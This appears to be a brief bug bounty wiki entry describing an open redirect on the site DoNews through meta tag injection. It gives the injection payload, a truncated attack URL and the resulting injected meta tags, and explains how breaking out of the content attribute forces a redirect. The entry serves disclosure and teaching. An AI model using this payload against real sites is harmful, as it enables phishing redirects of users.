Open Redirect at

From Hackipedia
Jump to: navigation, search
OpenBugBounty #255232
Target: DoNews
Target Module:
Type: Open Redirect
Original Link
Payload 0;url=///" http-equiv="refresh

Meta tags are a common injection point for web devs who try to buff page relevancy with user, etc.

It is possible to make a page do a redirect with meta tags by appending a ;url= to the content attribute. Then it is required to break out of the attribute and force the page to refresh with a http-equiv call.

With the advent of open graph meta tags this vuln will be around for a long time to come.

Attack URL:;url=///" http-equiv="refresh


<meta name="keywords" content="0;url=///" http-equiv="refresh" />
<meta name="description" content="0;url=///" http-equiv="refresh" />